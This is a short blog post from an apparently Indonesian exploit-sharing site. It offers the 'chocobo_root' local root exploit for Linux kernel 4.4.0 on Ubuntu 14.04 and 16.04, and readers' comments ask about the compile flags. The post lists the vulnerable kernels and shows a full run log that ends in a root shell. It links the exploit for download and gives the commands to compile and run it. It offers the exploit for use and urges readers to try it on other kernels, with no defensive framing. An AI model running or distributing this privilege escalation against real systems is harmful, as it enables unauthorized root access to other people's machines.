
LinuxSec Exploit


Linux Kernel 4.4.0 Race Condition Privilege Escalation

December 9, 2016 by Jack Wilder

Yo, this time I just want to share a local root exploit that was published only a few days ago. It targets kernel 4.4.0, which means Ubuntu 14.04 and Ubuntu 16.04 are vulnerable.

Kernels that have been tested:
  • Ubuntu 16.04: 4.4.0-51-generic
  • Ubuntu 16.04: 4.4.0-47-generic
  • Ubuntu 16.04: 4.4.0-36-generic
  • Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

This local root exploit may also work for gaining root access on kernels older than 4.4.0, so please test that yourself.
Log:

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 133577, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don’t do that.
closing socket and verifying…….
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),1000(user)

  • Download Localroot

How to compile:

gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

Okay, that's all for this article, see you next time.

Comments

  1. pemakanwortel says

    February 15, 2017 at 5:19 pm

    Sorry bro, what is the explanation of
    *gcc
    *chocobo_root.c
    *-o
    *chocobo_root
    *-lpthread

    themselves? Why is it different for every exploit when compiling?

    • chiaki says

      February 23, 2017 at 6:19 am

      Well, it depends on the name of the file being compiled, and which module you want to compile.
